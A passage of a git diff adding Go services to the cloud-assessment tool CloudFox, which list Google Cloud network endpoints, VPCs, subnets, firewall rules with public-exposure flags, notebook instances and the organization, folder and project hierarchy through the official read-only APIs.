`json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` +} + +// PrivateConnection represents a private service connection (e.g., for Cloud SQL) +type PrivateConnection struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` + AccessibleServices []string `json:"accessibleServices"` +} + +// ServiceAttachmentIAMBinding represents an IAM binding for a service attachment +type ServiceAttachmentIAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ServiceAttachment represents a PSC service attachment (producer side) +type ServiceAttachment struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + IAMBindings []ServiceAttachmentIAMBinding `json:"iamBindings"` +} + +// GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules +func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var endpoints []PrivateServiceConnectEndpoint + + // List forwarding rules across all regions + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, rule := range scopedList.ForwardingRules { + // Check if this is a PSC endpoint + if rule.Target == "" { + continue + } + + // PSC endpoints target service attachments or Google APIs + isPSC := false + targetType := "" + + if strings.Contains(rule.Target, "serviceAttachments") { + isPSC = true + targetType = "service-attachment" + } else if strings.Contains(rule.Target, "all-apis") || + strings.Contains(rule.Target, "vpc-sc") || + rule.Target == "all-apis" { + isPSC = true + targetType = "google-apis" + } + + if !isPSC { + continue + } + + endpoint := PrivateServiceConnectEndpoint{ + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, + } + + // Check connection state (for PSC endpoints to service attachments) + if rule.PscConnectionStatus != "" { + endpoint.ConnectionState = rule.PscConnectionStatus + } else { + endpoint.ConnectionState = "ACTIVE" + } + + endpoints = append(endpoints, endpoint) + } + } + return nil + }) + + return endpoints, err +} + +// GetPrivateConnections retrieves private service connections +func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]PrivateConnection, error) { + ctx := context.Background() + service, err := servicenetworking.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") + } + + var connections []PrivateConnection + + // List connections for the project's networks + computeService, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + // Get all networks + networks, err := computeService.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, network := range networks.Items { + networkName := fmt.Sprintf("projects/%s/global/networks/%s", projectID, network.Name) + + // List connections for this network + resp, err := service.Services.Connections.List("services/servicenetworking.googleapis.com"). + Network(networkName).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no connections + } + + for _, conn := range resp.Connections { + connection := PrivateConnection{ + Name: conn.Peering, + ProjectID: projectID, + Network: network.Name, + Service: conn.Service, + ReservedRanges: conn.ReservedPeeringRanges, + PeeringName: conn.Peering, + } + + // Determine accessible services based on the connection + connection.AccessibleServices = s.determineAccessibleServices(conn.Service) + + connections = append(connections, connection) + } + } + + return connections, nil +} + +// GetServiceAttachments retrieves PSC service attachments (producer side) +func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var attachments []ServiceAttachment + + req := service.ServiceAttachments.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, attachment := range scopedList.ServiceAttachments { + sa := ServiceAttachment{ + Name: attachment.Name, + ProjectID: projectID, + Region: regionName, + TargetService: extractName(attachment.TargetService), + ConnectionPreference: attachment.ConnectionPreference, + EnableProxyProtocol: attachment.EnableProxyProtocol, + } + + // Extract NAT subnets + for _, subnet := range attachment.NatSubnets { + sa.NatSubnets = append(sa.NatSubnets, extractName(subnet)) + } + + // Count connected endpoints + if attachment.ConnectedEndpoints != nil { + sa.ConnectedEndpoints = len(attachment.ConnectedEndpoints) + } + + // Extract consumer accept/reject lists + for _, accept := range attachment.ConsumerAcceptLists { + sa.ConsumerAcceptLists = append(sa.ConsumerAcceptLists, accept.ProjectIdOrNum) + } + for _, reject := range attachment.ConsumerRejectLists { + sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) + } + + // Get IAM bindings for the service attachment + sa.IAMBindings = s.getServiceAttachmentIAMBindings(ctx, service, projectID, regionName, attachment.Name) + + attachments = append(attachments, sa) + } + } + return nil + }) + + return attachments, err +} + +// getServiceAttachmentIAMBindings retrieves IAM bindings for a service attachment +func (s *NetworkEndpointsService) getServiceAttachmentIAMBindings(ctx context.Context, service *compute.Service, projectID, region, attachmentName string) []ServiceAttachmentIAMBinding { + policy, err := service.ServiceAttachments.GetIamPolicy(projectID, region, attachmentName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []ServiceAttachmentIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, ServiceAttachmentIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { + // Map service names to what they provide access to + serviceMap := map[string][]string{ + "servicenetworking.googleapis.com": {"Cloud SQL", "Memorystore", "Filestore", "Cloud Build"}, + } + + if services, ok := serviceMap[service]; ok { + return services + } + return []string{service} +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 382db204..c104ea2c 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -7,6 +7,7 @@ import ( "strings" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) @@ -57,17 +58,30 @@ type Endpoint struct { } type NetwworkService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new NetworkService (legacy - uses ADC directly) func New() *NetwworkService { return &NetwworkService{} } +// NewWithSession creates a NetworkService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { + return &NetwworkService{session: session} +} + // Returns firewall rules for a project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } if err != nil { return nil, err } @@ -256,5 +270,276 @@ func parseFirewallRule(fw *compute.Firewall, projectID string) (FirewallRule, er }, nil } -// TODO -// func (ns *NetworkService) ForwardingRules() {} +// VPCInfo holds VPC network details +type VPCInfo struct { + Name string + ProjectID string + Description string + AutoCreateSubnetworks bool + RoutingMode string // REGIONAL or GLOBAL + Mtu int64 + Subnetworks []string + Peerings []VPCPeering + CreationTime string +} + +// VPCPeering holds VPC peering details +type VPCPeering struct { + Name string + Network string + State string + ExportCustomRoutes bool + ImportCustomRoutes bool + ExchangeSubnetRoutes bool +} + +// SubnetInfo holds subnet details +type SubnetInfo struct { + Name string + ProjectID string + Region string + Network string + IPCidrRange string + GatewayAddress string + PrivateIPGoogleAccess bool + Purpose string + StackType string + CreationTime string +} + +// FirewallRuleInfo holds enhanced firewall rule details for security analysis +type FirewallRuleInfo struct { + Name string + ProjectID string + Description string + Network string + Priority int64 + Direction string // INGRESS or EGRESS + Disabled bool + + // Source/Destination + SourceRanges []string + SourceTags []string + SourceSAs []string + DestinationRanges []string + TargetTags []string + TargetSAs []string + + // Traffic + AllowedProtocols map[string][]string // protocol -> ports + DeniedProtocols map[string][]string + + // Security analysis + IsPublicIngress bool // 0.0.0.0/0 in source ranges + IsPublicEgress bool // 0.0.0.0/0 in destination ranges + AllowsAllPorts bool // Empty ports = all ports + LoggingEnabled bool // Firewall logging enabled +} + +// Networks retrieves all VPC networks in a project +func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var networks []VPCInfo + + networkList, err := computeService.Networks.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, network := range networkList.Items { + info := VPCInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + Mtu: network.Mtu, + Subnetworks: network.Subnetworks, + CreationTime: network.CreationTimestamp, + } + + // Parse peerings + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, VPCPeering{ + Name: peering.Name, + Network: peering.Network, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + }) + } + + networks = append(networks, info) + } + + return networks, nil +} + +// Subnets retrieves all subnets in a project +func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var subnets []SubnetInfo + + // List subnets across all regions + subnetList, err := computeService.Subnetworks.AggregatedList(projectID).Do() + if err != nil { + return nil, err + } + + for _, scopedList := range subnetList.Items { + for _, subnet := range scopedList.Subnetworks { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Region: extractRegionFromURL(subnet.Region), + Network: extractNameFromURL(subnet.Network), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + StackType: subnet.StackType, + CreationTime: subnet.CreationTimestamp, + } + subnets = append(subnets, info) + } + } + + return subnets, nil +} + +// FirewallRulesEnhanced retrieves firewall rules with security analysis +func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var rules []FirewallRuleInfo + + firewallList, err := computeService.Firewalls.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, fw := range firewallList.Items { + info := FirewallRuleInfo{ + Name: fw.Name, + ProjectID: projectID, + Description: fw.Description, + Network: extractNameFromURL(fw.Network), + Priority: fw.Priority, + Direction: fw.Direction, + Disabled: fw.Disabled, + SourceRanges: fw.SourceRanges, + SourceTags: fw.SourceTags, + SourceSAs: fw.SourceServiceAccounts, + DestinationRanges: fw.DestinationRanges, + TargetTags: fw.TargetTags, + TargetSAs: fw.TargetServiceAccounts, + AllowedProtocols: make(map[string][]string), + DeniedProtocols: make(map[string][]string), + } + + // Parse allowed protocols + for _, allowed := range fw.Allowed { + info.AllowedProtocols[allowed.IPProtocol] = allowed.Ports + if len(allowed.Ports) == 0 { + info.AllowsAllPorts = true + } + } + + // Parse denied protocols + for _, denied := range fw.Denied { + info.DeniedProtocols[denied.IPProtocol] = denied.Ports + } + + // Security analysis - check for public ingress/egress + for _, source := range fw.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + info.IsPublicIngress = true + break + } + } + for _, dest := range fw.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + info.IsPublicEgress = true + break + } + } + + // Check if logging is enabled + if fw.LogConfig != nil && fw.LogConfig.Enable { + info.LoggingEnabled = true + } + + rules = append(rules, info) + } + + return rules, nil +} + +// Helper functions +func extractNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// GetComputeService returns a compute.Service instance for external use +func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + return computeService, nil +} diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go new file mode 100644 index 00000000..fd7bed6f --- /dev/null +++ b/gcp/services/notebooksService/notebooksService.go @@ -0,0 +1,226 @@ +package notebooksservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + notebooks "google.golang.org/api/notebooks/v1" +) + +type NotebooksService struct { + session *gcpinternal.SafeSession +} + +func New() *NotebooksService { + return &NotebooksService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { + return &NotebooksService{session: session} +} + +// NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance +type NotebookInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + ProxyUri string `json:"proxyUri"` + Creator string `json:"creator"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Disk config + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + + // GPU config + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` + + // Other config + InstallGpuDriver bool `json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` +} + +// RuntimeInfo represents a managed notebook runtime +type RuntimeInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` +} + +// ListInstances retrieves all notebook instances +func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var instances []NotebookInstanceInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + return instances, nil +} + +// ListRuntimes retrieves all managed notebook runtimes +func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var runtimes []RuntimeInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Runtimes.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListRuntimesResponse) error { + for _, runtime := range page.Runtimes { + info := s.parseRuntime(runtime, projectID) + runtimes = append(runtimes, info) + } + return nil + }) + if err != nil { + // Runtimes API might not be available in all regions + return runtimes, nil + } + + return runtimes, nil +} + +func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID string) NotebookInstanceInfo { + info := NotebookInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + State: instance.State, + MachineType: extractName(instance.MachineType), + CreateTime: instance.CreateTime, + UpdateTime: instance.UpdateTime, + } + + // Service account + info.ServiceAccount = instance.ServiceAccount + + // Network config + info.Network = extractName(instance.Network) + info.Subnet = extractName(instance.Subnet) + info.NoPublicIP = instance.NoPublicIp + info.NoProxyAccess = instance.NoProxyAccess + + // Proxy URI and Creator + info.ProxyUri = instance.ProxyUri + info.Creator = instance.Creator + + // Boot disk + info.BootDiskType = instance.BootDiskType + info.BootDiskSizeGB = instance.BootDiskSizeGb + + // Data disk + info.DataDiskType = instance.DataDiskType + info.DataDiskSizeGB = instance.DataDiskSizeGb + + // GPU config + if instance.AcceleratorConfig != nil { + info.AcceleratorType = instance.AcceleratorConfig.Type + info.AcceleratorCount = instance.AcceleratorConfig.CoreCount + } + info.InstallGpuDriver = instance.InstallGpuDriver + + // Custom container + if instance.ContainerImage != nil { + info.CustomContainer = true + } + + return info +} + +func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { + info := RuntimeInfo{ + Name: extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, + } + + if runtime.VirtualMachine != nil { + info.RuntimeType = "VirtualMachine" + if runtime.VirtualMachine.VirtualMachineConfig != nil { + config := runtime.VirtualMachine.VirtualMachineConfig + info.MachineType = config.MachineType + info.Network = extractName(config.Network) + info.Subnet = extractName(config.Subnet) + } + } + + if runtime.AccessConfig != nil { + info.ServiceAccount = runtime.AccessConfig.RuntimeOwner + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go new file mode 100644 index 00000000..ae4c2654 --- /dev/null +++ b/gcp/services/organizationsService/organizationsService.go @@ -0,0 +1,470 @@ +package organizationsservice + +import ( + "context" + "fmt" + "strings" + + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" +) + +type OrganizationsService struct { + session *gcpinternal.SafeSession +} + +// New creates a new OrganizationsService +func New() *OrganizationsService { + return &OrganizationsService{} +} + +// NewWithSession creates an OrganizationsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *OrganizationsService { + return &OrganizationsService{session: session} +} + +// OrganizationInfo represents organization details +type OrganizationInfo struct { + Name string `json:"name"` // organizations/ORGANIZATION_ID + DisplayName string `json:"displayName"` + DirectoryID string `json:"directoryId"` // Cloud Identity directory ID + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// FolderInfo represents folder details +type FolderInfo struct { + Name string `json:"name"` // folders/FOLDER_ID + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// ProjectInfo represents project details +type ProjectInfo struct { + Name string `json:"name"` // projects/PROJECT_ID + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + Labels map[string]string `json:"labels"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// HierarchyNode represents a node in the resource hierarchy +type HierarchyNode struct { + Type string `json:"type"` // organization, folder, project + ID string `json:"id"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` + Children []HierarchyNode `json:"children"` + Depth int `json:"depth"` +} + +// SearchOrganizations searches for organizations accessible to the caller +func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) { + ctx := context.Background() + var client *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var orgs []OrganizationInfo + + req := &resourcemanagerpb.SearchOrganizationsRequest{} + it := client.SearchOrganizations(ctx, req) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + orgInfo := OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + State: org.State.String(), + } + if org.CreateTime != nil { + orgInfo.CreateTime = org.CreateTime.AsTime().String() + } + if org.UpdateTime != nil { + orgInfo.UpdateTime = org.UpdateTime.AsTime().String() + } + if org.DeleteTime != nil { + orgInfo.DeleteTime = org.DeleteTime.AsTime().String() + } + + orgs = append(orgs, orgInfo) + } + + return orgs, nil +} + +// SearchFolders searches for folders under a given parent +func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + // Search for folders under the given parent + query := fmt.Sprintf("parent=%s", parent) + req := &resourcemanagerpb.SearchFoldersRequest{ + Query: query, + } + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchAllFolders searches for all accessible folders +func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + req := &resourcemanagerpb.SearchFoldersRequest{} + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchProjects searches for projects +func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, error) { + ctx := context.Background() + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var projects []ProjectInfo + + query := "" + if parent != "" { + query = fmt.Sprintf("parent=%s", parent) + } + req := &resourcemanagerpb.SearchProjectsRequest{ + Query: query, + } + it := client.SearchProjects(ctx, req) + for { + project, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + projectInfo := ProjectInfo{ + Name: project.Name, + ProjectID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State.String(), + Labels: project.Labels, + } + if project.CreateTime != nil { + projectInfo.CreateTime = project.CreateTime.AsTime().String() + } + if project.UpdateTime != nil { + projectInfo.UpdateTime = project.UpdateTime.AsTime().String() + } + if project.DeleteTime != nil { + projectInfo.DeleteTime = project.DeleteTime.AsTime().String() + } + + projects = append(projects, projectInfo) + } + + return projects, nil +} + +// GetProjectAncestry returns the ancestry path from project to organization +func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]HierarchyNode, error) { + ctx := context.Background() + + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer projectsClient.Close() + + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + var ancestry []HierarchyNode + resourceID := "projects/" + projectID + + for { + if strings.HasPrefix(resourceID, "organizations/") { + orgID := strings.TrimPrefix(resourceID, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: resourceID, + }) + break + } else if strings.HasPrefix(resourceID, "folders/") { + folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) + if err != nil { + break + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + ancestry = append(ancestry, HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + resourceID = folder.Parent + } else if strings.HasPrefix(resourceID, "projects/") { + project, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) + if err != nil { + break + } + ancestry = append(ancestry, HierarchyNode{ + Type: "project", + ID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + }) + resourceID = project.Parent + } else { + break + } + } + + // Reverse to go from organization to project + for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { + ancestry[i], ancestry[j] = ancestry[j], ancestry[i] + } + + // Set depth + for i := range ancestry { + ancestry[i].Depth = i + } + + return ancestry, nil +} + +// GetOrganizationIDFromProject returns the organization ID for a given project +// by walking up the resource hierarchy until it finds an organization +func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (string, error) { + ancestry, err := s.GetProjectAncestry(projectID) + if err != nil { + return "", err + } + + for _, node := range ancestry { + if node.Type == "organization" { + return node.ID, nil + } + } + + return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) +} + +// BuildHierarchy builds a complete hierarchy tree +func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { + // Get organizations + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + var roots []HierarchyNode + + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNode := HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + Depth: 0, + Children: []HierarchyNode{}, + } + + // Get folders under this org + s.buildFolderTree(&orgNode, org.Name, 1) + + // Get projects directly under org + projects, err := s.SearchProjects(org.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: 1, + } + orgNode.Children = append(orgNode.Children, projNode) + } + } + + roots = append(roots, orgNode) + } + + return roots, nil +} + +// buildFolderTree recursively builds folder tree +func (s *OrganizationsService) buildFolderTree(parent *HierarchyNode, parentName string, depth int) { + folders, err := s.SearchFolders(parentName) + if err != nil { + 